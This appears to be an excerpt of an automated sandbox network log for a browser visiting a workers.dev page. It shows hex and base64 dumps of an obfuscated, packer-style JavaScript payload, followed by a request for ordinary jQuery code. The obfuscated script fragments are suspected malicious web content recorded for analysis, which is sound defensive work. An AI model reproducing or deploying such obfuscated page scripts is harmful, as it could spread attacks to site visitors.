                                                                                                                                                                                                                                                                                2024-10-06 14:41:49 UTC1369INData Raw: 52 6d 62 32 63 6b 4d 43 77 67 4a 47 5a 76 5a 79 51 78 4c 43 41 6b 5a 6d 39 6e 4a 44 49 73 49 43 52 6d 62 32 63 6b 4d 79 77 67 4a 47 5a 76 5a 79 51 30 4c 43 41 6b 5a 6d 39 6e 4a 44 55 73 49 43 52 6d 62 32 63 6b 4e 69 77 67 4a 47 5a 76 5a 79 51 33 4c 43 41 6b 5a 6d 39 6e 4a 44 67 73 49 43 52 6d 62 32 63 6b 4f 53 77 67 4a 47 5a 76 5a 79 51 78 4d 43 77 67 4a 47 5a 76 5a 79 51 78 4d 53 77 67 4a 47 5a 76 5a 79 51 78 4d 69 77 67 4a 47 5a 76 5a 79 51 78 4d 79 77 67 4a 47 5a 76 5a 79 51 78 4e 43 77 67 4a 47 5a 76 5a 79 51 78 4e 53 77 67 4a 47 5a 76 5a 79 51 78 4e 69 77 67 4a 47 5a 76 5a 79 51 78 4e 79 77 67 4a 47 5a 76 5a 79 51 78 4f 43 77 67 4a 47 5a 76 5a 79 51 7a 4d 53 77 67 4a 47 5a 76 5a 79 51 79 4d 69 77 67 4a 47 5a 76 5a 79 51 79 4d 53 77 67 4a 47 5a 76 5a
                                                                                                                                                                                                                                                                                Data Ascii: Rmb2ckMCwgJGZvZyQxLCAkZm9nJDIsICRmb2ckMywgJGZvZyQ0LCAkZm9nJDUsICRmb2ckNiwgJGZvZyQ3LCAkZm9nJDgsICRmb2ckOSwgJGZvZyQxMCwgJGZvZyQxMSwgJGZvZyQxMiwgJGZvZyQxMywgJGZvZyQxNCwgJGZvZyQxNSwgJGZvZyQxNiwgJGZvZyQxNywgJGZvZyQxOCwgJGZvZyQzMSwgJGZvZyQyMiwgJGZvZyQyMSwgJGZvZ
                                                                                                                                                                                                                                                                                2024-10-06 14:41:49 UTC1369INData Raw: 39 5a 6e 56 75 59 33 52 70 62 32 34 6f 4b 58 74 79 5a 58 52 31 63 6d 34 67 4a 47 5a 76 5a 79 51 78 4d 48 30 37 59 7a 30 6b 5a 6d 39 6e 4a 44 6c 39 4f 33 64 6f 61 57 78 6c 4b 47 4d 74 4c 53 6c 70 5a 69 68 72 57 32 4e 64 4b 58 41 39 63 46 73 6b 5a 6d 39 6e 4a 44 45 79 58 53 68 75 5a 58 63 67 55 6d 56 6e 52 58 68 77 4b 43 52 6d 62 32 63 6b 4f 43 74 6c 4b 47 4d 70 4b 79 52 6d 62 32 63 6b 4f 43 77 6b 5a 6d 39 6e 4a 44 63 70 4c 47 74 62 59 31 30 70 4f 33 4a 6c 64 48 56 79 62 69 42 77 66 53 67 6b 5a 6d 39 6e 4a 44 59 73 4a 47 5a 76 5a 79 51 31 4c 43 52 6d 62 32 63 6b 4e 43 77 6b 5a 6d 39 6e 4a 44 4a 62 4a 47 5a 76 5a 79 51 7a 58 53 67 6b 5a 6d 39 6e 4a 44 45 70 4c 43 52 6d 62 32 63 6b 4d 43 78 37 66 53 6b 70 44 51 70 39 4b 53 67 69 49 69 77 67 4d 7a 55 73 49 43
                                                                                                                                                                                                                                                                                Data Ascii: 9ZnVuY3Rpb24oKXtyZXR1cm4gJGZvZyQxMH07Yz0kZm9nJDl9O3doaWxlKGMtLSlpZihrW2NdKXA9cFskZm9nJDEyXShuZXcgUmVnRXhwKCRmb2ckOCtlKGMpKyRmb2ckOCwkZm9nJDcpLGtbY10pO3JldHVybiBwfSgkZm9nJDYsJGZvZyQ1LCRmb2ckNCwkZm9nJDJbJGZvZyQzXSgkZm9nJDEpLCRmb2ckMCx7fSkpDQp9KSgiIiwgMzUsIC
                                                                                                                                                                                                                                                                                2024-10-06 14:41:49 UTC1369INData Raw: 62 55 45 70 4d 55 6c 6a 4b 57 46 64 59 56 31 31 58 43 4a 63 58 44 35 63 49 6c 78 63 61 31 77 69 58 46 77 39 4d 6e 6f 79 58 43 4a 63 58 44 39 63 49 6c 78 63 61 31 77 69 58 46 78 62 5a 79 70 63 49 6c 78 63 57 32 59 32 61 6c 31 69 59 56 31 2f 61 57 46 64 59 6d 46 64 50 53 73 71 56 48 4e 68 58 43 4a 63 58 46 6c 4a 58 43 4a 63 58 46 77 69 58 46 78 63 49 6c 78 63 58 43 4a 63 58 47 6c 68 58 57 4a 68 58 54 31 2f 58 43 4a 63 58 46 77 69 58 46 78 63 49 6c 78 63 58 43 4a 63 58 47 6c 68 58 57 4a 68 58 54 30 33 4f 32 4d 37 65 48 55 78 58 43 4a 63 58 46 6c 4a 58 43 4a 63 58 46 77 69 58 46 78 63 49 6c 78 63 58 43 4a 63 58 46 77 69 58 46 78 63 49 6c 78 63 58 43 4a 63 58 46 77 69 58 46 78 70 59 56 31 69 59 56 31 39 58 43 4a 63 58 43 73 71 58 43 4a 63 58 46 42 7a 58 43 4a
                                                                                                                                                                                                                                                                                Data Ascii: bUEpMUljKWFdYV11XCJcXD5cIlxca1wiXFw9MnoyXCJcXD9cIlxca1wiXFxbZypcIlxcW2Y2al1iYV1/aWFdYmFdPSsqVHNhXCJcXFlJXCJcXFwiXFxcIlxcXCJcXGlhXWJhXT1/XCJcXFwiXFxcIlxcXCJcXGlhXWJhXT03O2M7eHUxXCJcXFlJXCJcXFwiXFxcIlxcXCJcXFwiXFxcIlxcXCJcXFwiXFxpYV1iYV19XCJcXCsqXCJcXFBzXCJ
                                                                                                                                                                                                                                                                                2024-10-06 14:41:49 UTC1369INData Raw: 44 4e 2f 54 30 64 6a 58 46 78 63 58 45 35 48 59 33 31 4e 63 33 31 4e 63 33 31 43 4d 54 4a 2f 52 48 6b 78 58 57 46 64 54 55 64 6a 66 57 55 79 66 30 78 48 59 33 39 4c 52 32 4e 2f 53 6b 64 6a 66 57 51 7a 66 30 6c 48 59 33 39 46 63 54 4a 2f 53 45 64 6a 66 57 55 79 66 33 42 73 58 46 78 63 58 45 64 48 59 31 78 63 58 46 78 6c 66 30 5a 48 59 33 39 46 52 32 4e 2f 52 45 64 6a 66 56 45 79 66 30 4e 48 59 33 31 43 52 32 4e 2f 65 30 64 6a 66 57 51 7a 66 33 70 48 59 33 31 61 53 33 38 77 59 56 31 68 58 58 31 69 52 33 77 33 52 33 31 4f 4d 6e 31 5a 66 58 6c 48 59 33 78 68 4e 6d 70 64 59 56 31 2f 64 30 64 6a 66 33 5a 48 59 33 39 31 52 32 4e 2f 53 31 46 39 52 32 67 79 66 32 45 31 58 57 46 64 4f 54 5a 71 58 57 46 64 63 30 64 6a 66 55 56 79 4d 6e 39 30 66 45 74 57 66 33 4a 48
                                                                                                                                                                                                                                                                                Data Ascii: DN/T0djXFxcXE5HY31Nc31Nc31CMTJ/RHkxXWFdTUdjfWUyf0xHY39LR2N/SkdjfWQzf0lHY39FcTJ/SEdjfWUyf3BsXFxcXEdHY1xcXFxlf0ZHY39FR2N/REdjfVEyf0NHY31CR2N/e0djfWQzf3pHY31aS38wYV1hXX1iR3w3R31OMn1ZfXlHY3xhNmpdYV1/d0djf3ZHY391R2N/S1F9R2gyf2E1XWFdOTZqXWFdc0djfUVyMn90fEtWf3JH
                                                                                                                                                                                                                                                                                2024-10-06 14:41:49 UTC1369INData Raw: 56 6a 66 56 45 79 66 32 31 4a 66 55 34 79 66 55 38 79 66 56 46 4e 66 31 4e 46 59 31 78 63 58 46 78 68 58 57 46 64 55 6d 67 79 66 31 46 6f 4d 6e 31 4b 61 6a 4a 2f 52 48 63 79 66 57 5a 4f 66 44 5a 2f 55 6b 56 6a 58 46 78 63 58 47 56 39 55 55 56 6a 66 56 42 46 59 33 78 62 59 56 31 68 58 54 63 7a 66 58 56 73 4d 6e 39 50 52 57 4e 2f 59 56 31 68 58 55 35 46 59 33 39 68 58 57 46 64 55 7a 56 71 58 57 46 64 5a 33 51 79 66 31 49 31 61 6c 31 68 58 54 56 55 58 46 78 63 58 44 52 55 66 56 5a 63 58 46 78 63 66 30 74 46 59 7a 77 32 66 33 70 38 55 54 56 71 58 57 46 64 66 55 70 46 59 33 31 52 4d 6e 39 51 4e 57 70 64 59 56 31 63 58 46 78 63 5a 57 39 2f 4d 44 4a 64 59 56 31 50 4e 57 70 64 59 56 31 2f 57 58 31 53 66 56 6c 39 62 30 46 64 59 56 31 69 65 7a 78 56 59 33 30 33 63
                                                                                                                                                                                                                                                                                Data Ascii: VjfVEyf21JfU4yfU8yfVFNf1NFY1xcXFxhXWFdUmgyf1FoMn1KajJ/RHcyfWZOfDZ/UkVjXFxcXGV9UUVjfVBFY3xbYV1hXTczfXVsMn9PRWN/YV1hXU5FY39hXWFdUzVqXWFdZ3Qyf1I1al1hXTVUXFxcXDRUfVZcXFxcf0tFYzw2f3p8UTVqXWFdfUpFY31RMn9QNWpdYV1cXFxcZW9/MDJdYV1PNWpdYV1/WX1SfVl9b0FdYV1iezxVY303c
                                                                                                                                                                                                                                                                                2024-10-06 14:41:49 UTC1369INData Raw: 64 59 56 31 37 52 47 4e 2f 66 58 70 45 59 33 78 42 4e 57 70 64 59 56 31 38 65 58 63 79 66 31 78 63 58 46 78 34 52 47 4e 2f 58 46 78 63 58 48 64 45 59 33 78 32 52 47 4e 2f 56 58 31 31 52 47 4d 38 53 6c 4e 39 4e 54 4a 39 57 58 31 53 66 56 6c 39 64 45 52 6a 66 54 41 79 58 57 46 64 65 6e 63 79 66 44 6f 7a 50 45 78 69 66 57 46 64 59 56 31 2f 57 47 63 38 63 7a 4e 39 66 7a 45 79 66 56 6c 39 55 58 31 36 4e 57 70 64 59 56 31 62 55 6e 78 36 4d 54 4a 2f 58 46 78 63 58 48 4a 45 59 33 39 63 58 46 78 63 63 55 52 6a 66 31 78 63 58 46 78 77 52 47 4e 39 4d 44 4a 64 59 56 31 36 64 7a 4a 38 4f 6a 4d 38 54 47 4a 39 59 56 31 68 58 58 39 59 5a 7a 78 4b 55 33 31 6c 4d 6e 30 78 4d 6e 30 78 4d 6e 30 78 4d 6e 30 78 4d 6e 31 76 52 47 4d 38 4e 56 56 39 61 7a 4e 39 62 6b 52 6a 50 45
                                                                                                                                                                                                                                                                                Data Ascii: dYV17RGN/fXpEY3xBNWpdYV18eXcyf1xcXFx4RGN/XFxcXHdEY3x2RGN/VX11RGM8SlN9NTJ9WX1SfVl9dERjfTAyXWFdencyfDozPExifWFdYV1/WGc8czN9fzEyfVl9UX16NWpdYV1bUnx6MTJ/XFxcXHJEY39cXFxccURjf1xcXFxwRGN9MDJdYV16dzJ8OjM8TGJ9YV1hXX9YZzxKU31lMn0xMn0xMn0xMn0xMn1vRGM8NVV9azN9bkRjPE
                                                                                                                                                                                                                                                                                2024-10-06 14:41:49 UTC1369INData Raw: 65 55 4e 6a 66 46 6c 2f 58 46 78 63 58 47 6b 31 61 6c 31 68 58 55 68 52 66 57 49 36 66 31 78 63 58 46 78 35 64 54 4a 2f 58 46 78 63 58 47 67 31 61 6c 31 68 58 58 5a 44 59 33 39 31 51 32 4e 2f 55 6e 31 5a 66 56 56 39 64 45 4e 6a 66 32 63 31 61 6c 31 68 58 58 4e 42 58 57 46 64 63 6b 4e 6a 66 33 46 44 59 33 31 5a 66 56 56 39 63 45 4e 6a 66 32 39 44 59 33 39 61 4d 6e 31 5a 66 57 46 64 59 56 31 38 61 48 63 79 50 44 42 4d 58 57 46 64 62 6b 4e 6a 66 57 74 71 50 45 70 52 66 56 6c 58 66 33 30 7a 4d 54 4a 39 4d 54 4a 39 62 55 4e 6a 66 30 56 61 50 44 56 56 66 56 6c 39 59 56 31 68 58 58 31 68 58 57 46 64 57 32 46 64 59 56 31 39 4f 6a 4d 38 53 6c 4e 39 4e 54 4a 39 57 58 31 53 66 56 6c 39 66 32 78 44 59 33 31 5a 66 55 70 6d 50 48 4d 7a 66 57 46 64 59 56 31 4e 59 6e 38
                                                                                                                                                                                                                                                                                Data Ascii: eUNjfFl/XFxcXGk1al1hXUhRfWI6f1xcXFx5dTJ/XFxcXGg1al1hXXZDY391Q2N/Un1ZfVV9dENjf2c1al1hXXNBXWFdckNjf3FDY31ZfVV9cENjf29DY39aMn1ZfWFdYV18aHcyPDBMXWFdbkNjfWtqPEpRfVlXf30zMTJ9MTJ9bUNjf0VaPDVVfVl9YV1hXX1hXWFdW2FdYV19OjM8SlN9NTJ9WX1SfVl9f2xDY31ZfUpmPHMzfWFdYV1NYn8
                                                                                                                                                                                                                                                                                2024-10-06 14:41:49 UTC1369INData Raw: 6a 4a 39 57 58 31 56 66 55 56 43 59 33 39 58 59 33 31 5a 57 32 46 64 59 56 31 38 52 45 4a 6a 50 46 64 54 66 54 45 79 66 56 6c 39 59 56 31 68 58 57 70 33 4d 6e 39 63 58 46 78 63 56 7a 6c 39 4e 54 4a 39 57 58 31 53 66 55 35 37 66 45 4e 43 59 33 31 5a 66 55 70 6d 50 48 4d 7a 66 57 46 64 59 56 31 4e 59 6e 38 79 4e 6a 78 43 51 6d 4e 39 65 7a 67 31 61 6c 31 68 58 58 70 43 59 33 31 35 51 6d 4e 39 57 58 31 56 66 58 68 43 59 33 39 58 59 33 31 5a 57 32 46 64 59 56 31 38 64 46 52 39 4e 54 4a 39 57 58 31 53 66 58 68 32 4d 6c 78 63 58 46 78 33 51 6d 4e 2f 58 46 78 63 58 47 74 6c 66 44 63 31 61 6c 31 68 58 54 59 31 61 6c 31 68 58 58 78 69 4f 6e 39 63 58 46 78 63 56 7a 6c 39 4e 54 4a 39 57 58 31 53 66 58 52 43 59 33 31 5a 66 55 70 6d 50 48 4d 7a 66 57 46 64 59 56 31 4e
                                                                                                                                                                                                                                                                                Data Ascii: jJ9WX1VfUVCY39XY31ZW2FdYV18REJjPFdTfTEyfVl9YV1hXWp3Mn9cXFxcVzl9NTJ9WX1SfU57fENCY31ZfUpmPHMzfWFdYV1NYn8yNjxCQmN9ezg1al1hXXpCY315QmN9WX1VfXhCY39XY31ZW2FdYV18dFR9NTJ9WX1SfXh2MlxcXFx3QmN/XFxcXGtlfDc1al1hXTY1al1hXXxiOn9cXFxcVzl9NTJ9WX1SfXRCY31ZfUpmPHMzfWFdYV1N
                                                                                                                                                                                                                                                                                2024-10-06 14:41:49 UTC1369INData Raw: 63 79 66 32 46 64 59 56 31 51 65 6a 78 4b 55 33 31 71 63 7a 4a 2f 52 58 74 6a 66 31 78 63 58 46 78 45 65 32 4e 2f 58 46 78 63 58 45 55 79 58 46 78 63 58 45 4e 37 59 33 39 63 58 46 78 63 51 6e 74 6a 66 31 6c 39 55 6e 31 37 65 32 4e 2f 64 47 51 78 58 57 46 64 65 6e 74 6a 66 57 74 2f 64 47 51 78 58 57 46 64 65 58 74 6a 66 57 74 2f 65 48 74 6a 66 56 6c 39 56 58 30 31 4d 33 38 78 4d 6e 30 36 64 7a 4a 2f 4e 32 34 38 53 6c 4e 39 4f 58 63 79 66 55 51 7a 50 45 70 52 66 58 41 79 66 55 59 79 66 54 70 33 4d 6e 38 33 62 6a 77 31 56 58 30 35 64 7a 4a 39 52 44 4d 38 53 6c 4e 39 64 33 74 6a 66 31 78 63 58 46 78 32 65 32 4e 2f 58 46 78 63 58 48 56 37 59 33 39 5a 66 56 4a 39 64 48 74 49 59 56 31 68 58 58 70 35 4d 56 31 68 58 55 74 52 66 48 4e 37 59 33 39 79 65 32 4e 63 58
                                                                                                                                                                                                                                                                                Data Ascii: cyf2FdYV1QejxKU31qczJ/RXtjf1xcXFxEe2N/XFxcXEUyXFxcXEN7Y39cXFxcQntjf1l9Un17e2N/dGQxXWFdentjfWt/dGQxXWFdeXtjfWt/eHtjfVl9VX01M38xMn06dzJ/N248SlN9OXcyfUQzPEpRfXAyfUYyfTp3Mn83bjw1VX05dzJ9RDM8SlN9d3tjf1xcXFx2e2N/XFxcXHV7Y39ZfVJ9dHtIYV1hXXp5MV1hXUtRfHN7Y39ye2NcX


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                2192.168.2.649723151.101.2.1374433568C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:50 UTC554OUTGET /jquery-3.4.1.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: code.jquery.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Referer: https://chattts-49f1.beszyrecala.workers.dev/
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-06 14:41:50 UTC613INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Content-Length: 88145
                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                                                                                                                ETag: "28feccc0-15851"
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Age: 3474849
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:50 GMT
                                                                                                                                                                                                                                                                                X-Served-By: cache-lga21965-LGA, cache-ewr-kewr1740050-EWR
                                                                                                                                                                                                                                                                                X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                X-Cache-Hits: 1554, 0
                                                                                                                                                                                                                                                                                X-Timer: S1728225710.207179,VS0,VE1
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                2024-10-06 14:41:50 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 34 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20
                                                                                                                                                                                                                                                                                Data Ascii: /*! jQuery v3.4.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery
                                                                                                                                                                                                                                                                                2024-10-06 14:41:50 UTC1378INData Raw: 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 6b 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6b 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 6b 2e 6d 61 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 6e 2e 63 61 6c 6c 28 65 2c 74 2c 65 29 7d 29 29 7d 2c 73 6c 69 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73
                                                                                                                                                                                                                                                                                Data Ascii: th]:this[e]},pushStack:function(e){var t=k.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return k.each(this,e)},map:function(n){return this.pushStack(k.map(this,function(e,t){return n.call(e,t,e)}))},slice:function(){return this
                                                                                                                                                                                                                                                                                2024-10-06 14:41:50 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f 6e 63 65 7d 29 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 30 3b 69 66 28 64 28 65 29 29 7b 66 6f 72 28 6e 3d 65 2e 6c 65 6e 67 74 68 3b 72 3c 6e 3b 72 2b 2b 29 69 66 28 21 31 3d 3d 3d 74 2e 63 61 6c 6c 28 65 5b 72 5d 2c 72 2c 65 5b 72 5d 29 29 62 72 65 61 6b 7d 65 6c 73 65 20 66 6f 72 28 72 20 69 6e 20 65 29 69 66 28 21 31 3d 3d 3d 74 2e 63 61 6c 6c 28 65 5b 72 5d 2c 72 2c 65 5b 72 5d 29 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 65 7d 2c 74 72 69 6d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 22 22 3a 28 65 2b 22 22 29 2e 72 65 70 6c 61 63 65 28 70 2c 22 22 29 7d 2c 6d 61 6b 65 41 72 72 61 79
                                                                                                                                                                                                                                                                                Data Ascii: ion(e,t){b(e,{nonce:t&&t.nonce})},each:function(e,t){var n,r=0;if(d(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?"":(e+"").replace(p,"")},makeArray
                                                                                                                                                                                                                                                                                2024-10-06 14:41:50 UTC1378INData Raw: 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 2c 49 3d 22 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5c 5c 77 2d 5d 7c 5b 5e 5c 30 2d 5c 5c 78 61 30 5d 29 2b 22 2c 57 3d 22 5c 5c 5b 22 2b 4d 2b 22 2a 28 22 2b 49 2b 22 29 28 3f 3a 22 2b 4d 2b 22 2a 28 5b 2a 5e 24 7c 21 7e 5d 3f 3d 29 22 2b 4d 2b 22 2a 28 3f 3a 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 7c 28 22 2b 49 2b 22 29 29 7c 29 22 2b 4d 2b 22 2a 5c 5c
                                                                                                                                                                                                                                                                                Data Ascii: trols|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t\\r\\n\\f]",I="(?:\\\\.|[\\w-]|[^\0-\\xa0])+",W="\\["+M+"*("+I+")(?:"+M+"*([*^$|!~]?=)"+M+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+I+"))|)"+M+"*\\
                                                                                                                                                                                                                                                                                2024-10-06 14:41:50 UTC1378INData Raw: 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c 78 37 66 2d 5c 75 46 46 46 46 5c 77 2d 5d 2f 67 2c 69 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 3f 22 5c 30 22 3d 3d 3d 65 3f 22 5c 75 66 66 66 64 22 3a 65 2e 73 6c 69 63 65 28 30 2c 2d 31 29 2b 22 5c 5c 22 2b 65 2e 63 68 61 72 43 6f 64 65 41 74 28 65 2e 6c 65 6e 67 74 68 2d 31 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 2b 22 20 22 3a 22 5c 5c 22 2b 65 7d 2c 6f 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 54 28 29 7d 2c 61 65 3d 62 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 30 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 26 26 22 66 69 65 6c 64 73 65 74 22 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65
                                                                                                                                                                                                                                                                                Data Ascii: },re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\x7f-\uFFFF\w-]/g,ie=function(e,t){return t?"\0"===e?"\ufffd":e.slice(0,-1)+"\\"+e.charCodeAt(e.length-1).toString(16)+" ":"\\"+e},oe=function(){T()},ae=be(function(e){return!0===e.disabled&&"fieldset"===e.nodeName
                                                                                                                                                                                                                                                                                2024-10-06 14:41:50 UTC1378INData Raw: 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28 65 29 7b 41 28 74 2c 21 30 29 7d 66 69 6e 61 6c 6c 79 7b 73 3d 3d 3d 6b 26 26 65 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 7d 7d 7d 72 65 74 75 72 6e 20 67 28 74 2e 72 65 70 6c 61 63 65 28 42 2c 22 24 31 22 29 2c 65 2c 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 75 65 28 29 7b 76 61 72 20 72 3d 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 72 2e 70 75 73 68 28 74 2b 22 20 22 29 3e 62 2e 63 61 63 68 65 4c 65 6e 67 74 68 26 26 64 65 6c 65 74 65 20 65 5b 72 2e 73 68 69 66 74 28 29 5d 2c 65 5b 74 2b 22 20 22 5d 3d 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 65 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 6b 5d 3d
                                                                                                                                                                                                                                                                                Data Ascii: uerySelectorAll(c)),n}catch(e){A(t,!0)}finally{s===k&&e.removeAttribute("id")}}}return g(t.replace(B,"$1"),e,n,r)}function ue(){var r=[];return function e(t,n){return r.push(t+" ")>b.cacheLength&&delete e[r.shift()],e[t+" "]=n}}function le(e){return e[k]=
                                                                                                                                                                                                                                                                                2024-10-06 14:41:50 UTC1378INData Raw: 52 49 2c 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 72 65 74 75 72 6e 21 59 2e 74 65 73 74 28 74 7c 7c 6e 26 26 6e 2e 6e 6f 64 65 4e 61 6d 65 7c 7c 22 48 54 4d 4c 22 29 7d 2c 54 3d 73 65 2e 73 65 74 44 6f 63 75 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 2c 72 3d 65 3f 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 3a 6d 3b 72 65 74 75 72 6e 20 72 21 3d 3d 43 26 26 39 3d 3d 3d 72 2e 6e 6f 64 65 54 79 70 65 26 26 72 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 26 26 28 61 3d 28 43 3d 72 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 45 3d 21 69 28 43 29 2c 6d 21 3d 3d 43 26 26 28 6e 3d 43 2e 64 65 66 61 75 6c 74 56 69 65 77 29 26 26 6e 2e
